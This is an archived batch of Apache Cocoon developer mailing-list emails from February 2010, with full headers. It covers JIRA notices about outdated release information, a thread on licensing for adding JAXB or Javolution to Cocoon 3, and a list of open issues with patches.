tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Feb 2010 08:49:49 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2FCEA234C1EE for <[email protected]>; Mon, 15 Feb 2010 00:49:28 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 15 Feb 2010 08:49:28 +0000 (UTC) From: =?utf-8?Q?Andreas_Kr=C3=BCger_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Updated: (COCOON-2279) http://www.apache.org/dist/cocoon/ and mirrors still list 2.1.11 as latest Cocoon release - needs update. In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/COCOON-2279?page=3Dcom.atlassi= an.jira.plugin.system.issuetabpanels:all-tabpanel ] Andreas Kr=C3=BCger updated COCOON-2279: ----------------------------------- Summary: http://www.apache.org/dist/cocoon/ and mirrors still list 2.1.= 11 as latest Cocoon release - needs update. (was: http://www.apache.org/di= st/cocoon/ an mirrors still list 2.1.11 as latest Cocoon release - needs up= date.) > http://www.apache.org/dist/cocoon/ and mirrors still list 2.1.11 as lates= t Cocoon release - needs update. > -------------------------------------------------------------------------= -------------------------------- > > Key: COCOON-2279 > URL: https://issues.apache.org/jira/browse/COCOON-2279 > Project: Cocoon > Issue Type: Task > Components: - Documentation > Reporter: Andreas Kr=C3=BCger > Priority: Minor > > Point your browser to http://www.apache.org/dist/cocoon/ .=20 > Is: Second paragraph starts with > > The latest release of Apache Cocoon is 2.1.11. > Should: > > The latest release of Apache Cocoon is 2.2.0. > The rest of that paragraph should probably be reviewed, too. > Regards, and thank you for providing fine software, > Andreas --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Mon Feb 15 20:00:29 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 706 invoked from network); 15 Feb 2010 20:00:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Feb 2010 20:00:29 -0000 Received: (qmail 88588 invoked by uid 500); 15 Feb 2010 08:53:49 -0000 Delivered-To: [email protected] Received: (qmail 88488 invoked by uid 500); 15 Feb 2010 08:53:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 88480 invoked by uid 99); 15 Feb 2010 08:53:48 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Feb 2010 08:53:48 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Feb 2010 08:53:48 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 08BD3234C1EE for <[email protected]>; Mon, 15 Feb 2010 00:53:28 -0800 (PST) Message-ID: <{{EMAIL+PHONE}}> Date: Mon, 15 Feb 2010 08:53:28 +0000 (UTC) From: =?utf-8?Q?Andreas_Kr=C3=BCger_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Created: (COCOON-2280) Cocoon Jira still lists version 2.2 as unreleased - needs update. MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 Cocoon Jira still lists version 2.2 as unreleased - needs update. ----------------------------------------------------------------- Key: COCOON-2280 URL: https://issues.apache.org/jira/browse/COCOON-2280 Project: Cocoon Issue Type: Task Components: - Documentation Reporter: Andreas Kr=C3=BCger Priority: Minor Point your browser to https://issues.apache.org/jira/secure/CreateIssue.jsp= a as if you wanted to enter a new Jira item for Cocoon. In the issue report= ing form that pops up, have a look at the choices given as "Affects Version= /s:". Is: Version 2.2 is labeled as an "Unreleased Version". Should be: Version 2.2 is labeled as a "Released Version". Regards, and thank you for providing fine software, Andreas --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Wed Feb 17 08:06:07 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41098 invoked from network); 17 Feb 2010 08:06:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Feb 2010 08:06:07 -0000 Received: (qmail 20388 invoked by uid 500); 17 Feb 2010 08:06:07 -0000 Delivered-To: [email protected] Received: (qmail 20258 invoked by uid 500); 17 Feb 2010 08:06:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 20250 invoked by uid 99); 17 Feb 2010 08:06:05 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 17 Feb 2010 08:06:05 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ey-out-1920.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 17 Feb 2010 08:05:56 +0000 Received: by ey-out-1920.google.com with SMTP id 26so1439654eyw.20 for <[email protected]>; Wed, 17 Feb 2010 00:05:35 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=3EMI6tOeEhkdytv0M6Ewg6cgN6eqUZklCFlKJ35SI70=; b=wncYiZjijPtYBDC9NM20L3rTy2ClASzf7Q26Xvg58EdsFiJ3qsjDFQbzfba50yHwRI k3R75RHFB9YClmdYD1UrWQJDyzBf4QKjztnaHu4p4SY7kl2yi4E0rWLue5Se+oLkQsc1 x85lCQXH5TlcvG5i/uTf4gqbVvBvmfgEoFJD4= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=QAsXvhXLaf41QERhqKGUoIRLQF/Nr4uQm73CmTtElXiV2+OiPzGRL9tbSWrmE+tITq gtOekeyxdVl58v06W+IeHR7Y162bGtcefdOak6cE08/Sop0DBIfuNV7Vs2Z3/tJgAMDP wmxYWk4OpSpmACoo64TUl8luCZlZFDiTECXqs= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id q10mr4894876ebf.0.1266393927852; Wed, 17 Feb 2010 00:05:27 -0800 (PST) Date: Wed, 17 Feb 2010 09:05:27 +0100 Message-ID: <[email protected]> Subject: Adding new components to C3 Optionals From: Simone Tripodi <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 Hi all guys, even if a little late, I noticed an old email[1] in the users ML where one of C3 users was asking us how to integrate a JAXB marshaller into C3. After provided the hint, I suggested him to send a patch but at the same time I don't know if it could be applied because of the licensing: on the JAXB documentation I'm reading is reported that. * "JAXB is a redistributable component of the JWSDP" that's covered by the JWSDP License[3] * "Parts of the JAXP software bundled with JAXB are covered by the Apache License and the W3C License" I'm not a lawyer and honestly not expert about licenses: do you have any info that confirm we can/can't add JAXB in C3? Also Javolution[4] contains a nice and fast XML marshaller[5], but Javolution is released under the BSD[6] License. Are we allowed to integrate Javolution in C3? Thanks in advance, very appreciated!!! Simo [1] http://markmail.org/message/sql2zaa53vlktx2a [2] http://java.sun.com/webservices/docs/1.5/jaxb/index.html [3] http://java.sun.com/webservices/docs/1.5/LICENSE [4] http://javolution.org/ [5] http://javolution.org/target/site/apidocs/javolution/xml/package-summary.html#package_description [6] http://javolution.org/LICENSE.txt http://people.apache.org/~simonetripodi/ From [email protected] Wed Feb 17 10:41:51 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14533 invoked from network); 17 Feb 2010 10:41:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Feb 2010 10:41:51 -0000 Received: (qmail 30467 invoked by uid 500); 17 Feb 2010 10:41:50 -0000 Delivered-To: [email protected] Received: (qmail 30356 invoked by uid 500); 17 Feb 2010 10:41:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 30348 invoked by uid 99); 17 Feb 2010 10:41:49 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 17 Feb 2010 10:41:49 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 17 Feb 2010 10:41:48 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 5215F234C1F0 for <[email protected]>; Wed, 17 Feb 2010 02:41:28 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 17 Feb 2010 10:41:28 +0000 (UTC) From: [email protected] To: [email protected] Subject: [jira] Subscription: COCOON-open-with-patch MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 Issue Subscription Filter: COCOON-open-with-patch (112 issues) Subscriber: cocoon Key Summary COCOON-2281 "Communication tools that we use" link to dev mailing list archive comes out at user mailing list archive https://issues.apache.org/jira/browse/COCOON-2281 COCOON-2278 Make SOAPHelper use https, not just http https://issues.apache.org/jira/browse/COCOON-2278 COCOON-2268 To extend the image reader we need to change the visibility to the parameter of the ImageReader https://issues.apache.org/jira/browse/COCOON-2268 COCOON-2262 container.refresh() is called before embeddedServlet.init() https://issues.apache.org/jira/browse/COCOON-2262 COCOON-2260 wrong parent version in pom of cocoon-flowscript-impl https://issues.apache.org/jira/browse/COCOON-2260 COCOON-2259 Memory leak in PoolableProxyHandler https://issues.apache.org/jira/browse/COCOON-2259 COCOON-2250 Wrong error message in Element.java (jx:element) https://issues.apache.org/jira/browse/COCOON-2250 COCOON-2249 XHTMLSerializer uses entity references &quot; and &apos; which cause JavaScript parse errors https://issues.apache.org/jira/browse/COCOON-2249 COCOON-2246 HttpRequest should handle encoding in getParameter and getParameterValues in the same way https://issues.apache.org/jira/browse/COCOON-2246 COCOON-2233 Update archetypes to current trunk artifact versions https://issues.apache.org/jira/browse/COCOON-2233 COCOON-2222 Add SaxParser configuration properties https://issues.apache.org/jira/browse/COCOON-2222 COCOON-2216 IncludeCacheManager can not perfom parallel includes https://issues.apache.org/jira/browse/COCOON-2216 COCOON-2212 jx:attribute does not check name is correct before proceeding https://issues.apache.org/jira/browse/COCOON-2212 COCOON-2197 Making the cocoon-auth-block acegi-security-sample work https://issues.apache.org/jira/browse/COCOON-2197 COCOON-2173 AbstractCachingProcessingPipeline: Two requests can deadlock each other https://issues.apache.org/jira/browse/COCOON-2173 COCOON-2162 [PATCH] Fix for Paginator when accessing out of bounds Pagination page https://issues.apache.org/jira/browse/COCOON-2162 COCOON-2137 XSD Schemas for CForms Development https://issues.apache.org/jira/browse/COCOON-2137 COCOON-2114 fix sorting in TraversableGenerator https://issues.apache.org/jira/browse/COCOON-2114 COCOON-2108 xmodule:flow-attr Does not accept document objects https://issues.apache.org/jira/browse/COCOON-2108 COCOON-2104 [PATCH] Add base URI fixup support to XIncludeTransformer https://issues.apache.org/jira/browse/COCOON-2104 COCOON-2100 Retrieving mimeType returned by pipeline executed from Flow https://issues.apache.org/jira/browse/COCOON-2100 COCOON-2041 WebDAV Returns improper status on PUT https://issues.apache.org/jira/browse/COCOON-2041 COCOON-2040 Union widget does not work with booleanfield set as case widget https://issues.apache.org/jira/browse/COCOON-2040 COCOON-2037 New DynamicGroup widget https://issues.apache.org/jira/browse/COCOON-2037 COCOON-2035 NPE in the sorter of the EnhancedRepeater https://issues.apache.org/jira/browse/COCOON-2035 COCOON-2032 [PATCH] Sort order in paginated repeater https://issues.apache.org/jira/browse/COCOON-2032 COCOON-2030 submit-on-change doesn't work for a multivaluefield with list-type="checkbox" https://issues.apache.org/jira/browse/COCOON-2030 COCOON-2018 Use thread context class loader to load custom binding classes https://issues.apache.org/jira/browse/COCOON-2018 COCOON-2017 More output beautification options for serializers https://issues.apache.org/jira/browse/COCOON-2017 COCOON-2015 Doctype added twice because root element (html) is inlined https://issues.apache.org/jira/browse/COCOON-2015 COCOON-2002 HTML transformer only works with latin-1 characters https://issues.apache.org/jira/browse/COCOON-2002 COCOON-1974 Donating ContextAttributeInputModule https://issues.apache.org/jira/browse/COCOON-1974 COCOON-1973 CaptchaValidator: allow case-insensitive matching https://issues.apache.org/jira/browse/COCOON-1973 COCOON-1964 Redirects inside a block called via the servlet protocol fail https://issues.apache.org/jira/browse/COCOON-1964 COCOON-1963 Add a redirect action to the browser update handler https://issues.apache.org/jira/browse/COCOON-1963 COCOON-1960 Pipeline errors for "generator/reader already set" should provide more information https://issues.apache.org/jira/browse/COCOON-1960 COCOON-1949 [PATCH] load flowscript from file into specified Rhino context object https://issues.apache.org/jira/browse/COCOON-1949 COCOON-1946 [PATCH] - Javaflow Sample errors trying to enhance Javaflow classes and showing cform templates https://issues.apache.org/jira/browse/COCOON-1946 COCOON-1943 [Patch] Parameters in blocks-protocol URIs get decoded too early https://issues.apache.org/jira/browse/COCOON-1943 COCOON-1932 [PATCH] correct styling of disabled suggestion lists https://issues.apache.org/jira/browse/COCOON-1932 COCOON-1929 [PATCH] Reloading classloader in Cocoon 2.2 https://issues.apache.org/jira/browse/COCOON-1929 COCOON-1917 Request Encoding problem: multipart/form vs. url encoded https://issues.apache.org/jira/browse/COCOON-1917 COCOON-1915 Nullable value with additional String or XMLizable in JavaSelectionList https://issues.apache.org/jira/browse/COCOON-1915 COCOON-1914 Text as XMLizable in EmptySelectionList https://issues.apache.org/jira/browse/COCOON-1914 COCOON-1899 [PATCH] Cocoon XML:DB Implementation should not depend on Xindice https://issues.apache.org/jira/browse/COCOON-1899 COCOON-1898 [PATCH] XPatch support for maven-cocoon-deployer-plugin https://issues.apache.org/jira/browse/COCOON-1898 COCOON-1893 XML-Binding: Problem creating a new element https://issues.apache.org/jira/browse/COCOON-1893 COCOON-1877 [PATCH] Pageable Repeater https://issues.apache.org/jira/browse/COCOON-1877 COCOON-1870 Lucene block does not store attributes when instructed so https://issues.apache.org/jira/browse/COCOON-1870 COCOON-1846 [PATCH] BooleanField and radio do not send on-value-changed at the rigth time with IE https://issues.apache.org/jira/browse/COCOON-1846 COCOON-1843 LDAPTransformer: add-entry tag doesn't work https://issues.apache.org/jira/browse/COCOON-1843 COCOON-1842 LDAPTransformer: ClassCastException with Binary fields https://issues.apache.org/jira/browse/COCOON-1842 COCOON-1810 [PATCH] JMSEventMessageListener does not work https://issues.apache.org/jira/browse/COCOON-1810 COCOON-1807 Workaround for IE Bug in <button> https://issues.apache.org/jira/browse/COCOON-1807 COCOON-1794 [PATCH] Propagation of namespaces to a repeaters child bindings and implementation of a move-node binding https://issues.apache.org/jira/browse/COCOON-1794 COCOON-1738 double-listbox problem in repeaters https://issues.apache.org/jira/browse/COCOON-1738 COCOON-1726 Implementation of Source that supports conditional GETs https://issues.apache.org/jira/browse/COCOON-1726 COCOON-1717 Use custom cache keys for caching uri coplets using input modules. https://issues.apache.org/jira/browse/COCOON-1717 COCOON-1697 Allow request parameters to be used in "for (var k in h)" kind of Javascript Loops https://issues.apache.org/jira/browse/COCOON-1697 COCOON-1648 Add support for ISO8601 in I18nTransformer and Forms https://issues.apache.org/jira/browse/COCOON-1648 COCOON-1618 [PATCH] SoapGenerator/Serializer for Axis Block https://issues.apache.org/jira/browse/COCOON-1618 COCOON-1611 [PATCH] Add additonal constructor to FormInstance.java to be able to pass a locale https://issues.apache.org/jira/browse/COCOON-1611 COCOON-1603 [PATCH] handling of alternatives in MailTransformer https://issues.apache.org/jira/browse/COCOON-1603 COCOON-1573 Improvement SetAttributeJXPathBinding and Contribution SetNodeValueJXPathBinding https://issues.apache.org/jira/browse/COCOON-1573 COCOON-1556 [PATCH] Add a JXPathConvertor for conversion betwean beans and Strings https://issues.apache.org/jira/browse/COCOON-1556 COCOON-1535 [PATCH] enhancement to {global:} input module: return all sitemap globals https://issues.apache.org/jira/browse/COCOON-1535 COCOON-1527 [PATCH] Cache control logic sheets for XSP to override getKey and getValidity https://issues.apache.org/jira/browse/COCOON-1527 COCOON-1526 [PATCH] processToDOM returns a read-only DOM https://issues.apache.org/jira/browse/COCOON-1526 COCOON-1519 [PATCH] TeeTransformer refactoring https://issues.apache.org/jira/browse/COCOON-1519 COCOON-1508 [PATCH] Avalonize TranscoderFactory https://issues.apache.org/jira/browse/COCOON-1508 COCOON-1506 [PATCH] Manually specifying a mounted sitemap's context https://issues.apache.org/jira/browse/COCOON-1506 COCOON-1488 [PATCH] htmlunit-based testing, needs to be ported to 2.2 https://issues.apache.org/jira/browse/COCOON-1488 COCOON-1467 ESQL exception handling problem https://issues.apache.org/jira/browse/COCOON-1467 COCOON-1439 [poi] vertical text orientation and font cache https://issues.apache.org/jira/browse/COCOON-1439 COCOON-1398 New CachingPortletAdapter https://issues.apache.org/jira/browse/COCOON-1398 COCOON-1395 [PATCH] Missing ContextAttributeInputModule https://issues.apache.org/jira/browse/COCOON-1395 COCOON-1394 [PATCH] Implementation of PortletRequest#getQueryString() https://issues.apache.org/jira/browse/COCOON-1394 COCOON-1384 [PATCH] flow redirector should allow explicit 'cocoon:' scheme https://issues.apache.org/jira/browse/COCOON-1384 COCOON-1370 [PATCH] proxy block can now use JTidy and handle multipart POST https://issues.apache.org/jira/browse/COCOON-1370 COCOON-1368 [PATCH] HTTPRequestTransformer https://issues.apache.org/jira/browse/COCOON-1368 COCOON-1362 [PATCH] log4j.xconf should have the same default config as logkit.xconf https://issues.apache.org/jira/browse/COCOON-1362 COCOON-1360 [patch] client side validation for CForms https://issues.apache.org/jira/browse/COCOON-1360 COCOON-1345 [PATCH] Extract convertors into their own block https://issues.apache.org/jira/browse/COCOON-1345 COCOON-1340 [PATCH] lucene block contribution : a AnalyzerManager component https://issues.apache.org/jira/browse/COCOON-1340 COCOON-1337 [PATCH] Suggestion for widget population https://issues.apache.org/jira/browse/COCOON-1337 COCOON-1336 [PATCH] PortletWindowAspect: hiding portlet mode icons and new feature "force-sizable" https://issues.apache.org/jira/browse/COCOON-1336 COCOON-1332 [PATCH] content-length and content-type for portlet ActionRequest https://issues.apache.org/jira/browse/COCOON-1332 COCOON-1329 [PATCH] Fix for cocoon.jar bundled in ear common for portal.war and portlet.war https://issues.apache.org/jira/browse/COCOON-1329 COCOON-1325 [PATCH] commons-fileupload based multipart parser https://issues.apache.org/jira/browse/COCOON-1325 COCOON-1302 [Patch] Word Document Generator https://issues.apache.org/jira/browse/COCOON-1302 COCOON-1295 ParallelContentAggregator, multithreaded aggregating https://issues.apache.org/jira/browse/COCOON-1295 COCOON-1260 [PATCH] MultipartParser can now handle multipart/mixed https://issues.apache.org/jira/browse/COCOON-1260 COCOON-1254 [Patch] OWQLTransformer + RDQLTransformer https://issues.apache.org/jira/browse/COCOON-1254 COCOON-1249 [Patch] XMLDBSource should accept scheme://user:pass@host:port/path URIs https://issues.apache.org/jira/browse/COCOON-1249 COCOON-1232 [PATCH] NEW--ModuleDB Action for ORACLE( auto. increment ) https://issues.apache.org/jira/browse/COCOON-1232 COCOON-1203 [PATCH] inserver junit testing https://issues.apache.org/jira/browse/COCOON-1203 COCOON-1200 [PATCH] XML CSS engine https://issues.apache.org/jira/browse/COCOON-1200 COCOON-1185 [PATCH] BerkeleyDBStore https://issues.apache.org/jira/browse/COCOON-1185 COCOON-1147 [PATCH] namespace issues with XMLDBTransformer https://issues.apache.org/jira/browse/COCOON-1147 COCOON-1125 [PATCH] Updated CastorTransformer + samples https://issues.apache.org/jira/browse/COCOON-1125 COCOON-1027 [PATCH] CocoonBean add additional features for reprocessing pipelines and interrupt processing https://issues.apache.org/jira/browse/COCOON-1027 COCOON-996 [PATCH] LuceneIndexContentHandler.java produces CLOBs https://issues.apache.org/jira/browse/COCOON-996 COCOON-988 [PATCH] StreamGenerator can't handle multipart request parameters correctly https://issues.apache.org/jira/browse/COCOON-988 COCOON-881 [PATCH] file upload component for usage with flowscript https://issues.apache.org/jira/browse/COCOON-881 COCOON-871 [PATCH] XML posting from SourceWritingTransformer by using an enhanced HTTPClientSource https://issues.apache.org/jira/browse/COCOON-871 COCOON-867 [PATCH] wsinclude and htmlinclude transformers https://issues.apache.org/jira/browse/COCOON-867 COCOON-865 [PATCH] New ResourceLoadAction https://issues.apache.org/jira/browse/COCOON-865 COCOON-844 [PATCH] adding <wd:on-phase> and moving load() and save() to Form. https://issues.apache.org/jira/browse/COCOON-844 COCOON-825 [PATCH] Fix Bug: Better handling of CLOB in esql (get-xml) and handling of Oracle 'temporary lobs' https://issues.apache.org/jira/browse/COCOON-825 COCOON-719 [PATCH] Support for transactions in SQLTransformer https://issues.apache.org/jira/browse/COCOON-719 COCOON-717 [PATCH] Namespace cleanup in HTMLSerializer https://issues.apache.org/jira/browse/COCOON-717 COCOON-665 [PATCH] HSSFSerializer Support for FreezePane https://issues.apache.org/jira/browse/COCOON-665 You may edit this subscription at: https://issues.apache.org/jira/secure/FilterSubscription!default.jspa?subId=10311&filterId=12310771 From [email protected] Thu Feb 18 07:53:36 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45761 invoked from network); 18 Feb 2010 07:53:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Feb 2010 07:53:36 -0000 Received: (qmail 81040 invoked by uid 500); 18 Feb 2010 07:53:35 -0000 Delivered-To: [email protected] Received: (qmail 80942 invoked by uid 500); 18 Feb 2010 07:53:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 80934 invoked by uid 99); 18 Feb 2010 07:53:34 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Feb 2010 07:53:34 +0000 X-ASF-Spam-Status: No, hits=3.2 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO indoqa.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Feb 2010 07:53:24 +0000 Received: from [161.129.204.104] (unknown [161.129.204.104]) by indoqa.com (Postfix) with ESMTP id 9C85E1A0006 for <[email protected]>; Thu, 18 Feb 2010 08:53:00 +0100 (CET) Message-ID: <[email protected]> Date: Thu, 18 Feb 2010 08:53:25 +0100 From: =?UTF-8?B?UmVpbmhhcmQgUMO2dHo=?= <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20090812) MIME-Version: 1.0 To: [email protected] Subject: Re: Adding new components to C3 Optionals References: <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 0.96.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org Simone Tripodi wrote: > Hi all guys, > even if a little late, I noticed an old email[1] in the users ML where > one of C3 users was asking us how to integrate a JAXB marshaller into > C3. > After provided the hint, I suggested him to send a patch but at the > same time I don't know if it could be applied because of the > licensing: on the JAXB documentation I'm reading is reported that. > > * "JAXB is a redistributable component of the JWSDP" that's covered > by the JWSDP License[3] > * "Parts of the JAXP software bundled with JAXB are covered by the > Apache License and the W3C License" > > I'm not a lawyer and honestly not expert about licenses: do you have > any info that confirm we can/can't add JAXB in C3? > > Also Javolution[4] contains a nice and fast XML marshaller[5], but > Javolution is released under the BSD[6] License. Are we allowed to > integrate Javolution in C3? I've never used JAXB, but I found http://camel.apache.org/jaxb.html which says that JAXB is part of Java 6. In order to remain Java 5 compliant, we have to add an optional JAXB dependency. Maybe Apache WS, CXF or Geronimo offer an AL 2.0 complient implementation or you could at least find out how they provide JAXB support. -- Reinhard Pötz Managing Director, {Indoqa} GmbH http://www.indoqa.com/en/people/reinhard.poetz/ Member of the Apache Software Foundation Apache Cocoon Committer, PMC member [email protected] ________________________________________________________________________ From [email protected] Thu Feb 18 10:45:48 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12337 invoked from network); 18 Feb 2010 10:45:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Feb 2010 10:45:48 -0000 Received: (qmail 80708 invoked by uid 500); 18 Feb 2010 10:45:47 -0000 Delivered-To: [email protected] Received: (qmail 80586 invoked by uid 500); 18 Feb 2010 10:45:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 80578 invoked by uid 99); 18 Feb 2010 10:45:47 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Feb 2010 10:45:47 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ey-out-1920.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Feb 2010 10:45:39 +0000 Received: by ey-out-1920.google.com with SMTP id 26so1710774eyw.20 for <[email protected]>; Thu, 18 Feb 2010 02:45:18 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=XRrezfABCDqMyM6uZilQ4n6s9EKjgMv507tGG4GF2VU=; b=cs3WrisTqBVbWPcoGtCWibC2FSjB/0XxiM7VK/ha19sIGEUeYasXR7dtnUAtM3fMFQ LVvnuZeAWI51zjFxJ1rW+V2Q3cC0MjLkAsnS/M7TWD3XfKGGyJ0EOWJoTTvlTakLVaUV BLpFXRFtcyBM4qdCQxFSohaI9pXVHZl9ZgnGE= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=we8LW+z9Qq3yRVtqH5t//XZhgY7LQLauUWtETuB9jWIoPdMen4HIro6uZl8SaTvzVm WAoelJEmXZcq/XVJ9nK+Xn3vWU0QalMBauTWKX6r2cr3vm5U1o0gY/OxcXGcHSCOO6cc +LYwiSwfFnsKbqlNYlAsKqmiKKkJ+mWP0Naro= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id n25mr6403736ebo.78.1266489917947; Thu, 18 Feb 2010 02:45:17 -0800 (PST) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Thu, 18 Feb 2010 11:45:17 +0100 Message-ID: <[email protected]> Subject: Re: Adding new components to C3 Optionals From: Simone Tripodi <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Thank a lot Reinhard, I'll check the projects you mentioned!!! Have anice day :) Simo http://people.apache.org/~simonetripodi/ On Thu, Feb 18, 2010 at 8:53 AM, Reinhard P=C3=B6tz <[email protected]> w= rote: > Simone Tripodi wrote: >> Hi all guys, >> even if a little late, I noticed an old email[1] in the users ML where >> one of C3 users was asking us how to integrate a JAXB marshaller into >> C3. >> After provided the hint, I suggested him to send a patch but at the >> same time I don't know if it could be applied because of the >> licensing: on the JAXB documentation I'm reading is reported that. >> >> =C2=A0* "JAXB is a redistributable component of the JWSDP" that's covere= d >> by the JWSDP License[3] >> =C2=A0* "Parts of the JAXP software bundled with JAXB are covered by the >> Apache License and the W3C License" >> >> I'm not a lawyer and honestly not expert about licenses: do you have >> any info that confirm we can/can't add JAXB in C3? >> >> Also Javolution[4] contains a nice and fast XML marshaller[5], but >> Javolution is released under the BSD[6] License. Are we allowed to >> integrate Javolution in C3? > > I've never used JAXB, but I found http://camel.apache.org/jaxb.html > which says that JAXB is part of Java 6. > > In order to remain Java 5 compliant, we have to add an optional JAXB > dependency. Maybe Apache WS, CXF or Geronimo offer an AL 2.0 complient > implementation or you could at least find out how they provide JAXB suppo= rt. > > -- > Reinhard P=C3=B6tz =C2=A0 